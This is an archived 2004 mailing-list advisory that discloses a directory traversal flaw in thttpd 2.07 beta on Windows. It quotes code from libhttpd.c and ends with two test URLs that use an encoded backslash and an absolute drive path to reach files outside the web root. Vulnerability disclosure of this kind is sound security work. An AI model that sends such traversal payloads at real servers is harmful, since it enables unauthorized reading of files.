lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <y5959195844254.18918@mx2>
Date: Wed, 4 Aug 2004 16:02:44 +0800
From: "CoolICE" <CoolICE@...na.com>
To: "webmaster" <webmaster@...e.com>
Cc: "bugtraq" <bugtraq@...urityfocus.com>,
   "full-disclosure" <full-disclosure@...ts.netsys.com>,
   "list" <list@...uriteam.com>
Subject: Bug@...tpd


Application:	thttpd
Vendors:	http://www.acme.com/software/thttpd/
Version:	2.07 beta 0.4 10dec99
Platforms:	Windows
Bug:		Directory Traversal
Date:		2004-08-04
Author:		CoolICE
e-mail:		CoolICE#China.com
================
Content:
in libhttpd.c:
int
httpd_parse_request( httpd_conn* hc )
[...]
    if ( hc->decodedurl[0] != '/' )
	{
	httpd_send_err( hc, 400, httpd_err400title, httpd_err400form, "" );
	return -1;
	}

static int
really_start_request( httpd_conn* hc )
[...]
    if ( stat( hc->expnfilename, &hc->sb ) < 0 )
	{
	httpd_send_err( hc, 500, err500title, err500form, hc->encodedurl );
	return -1;
	}
------------------
TestCode:
http://localhost/%5c../test.ini
http://localhost/c:\test.ini

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ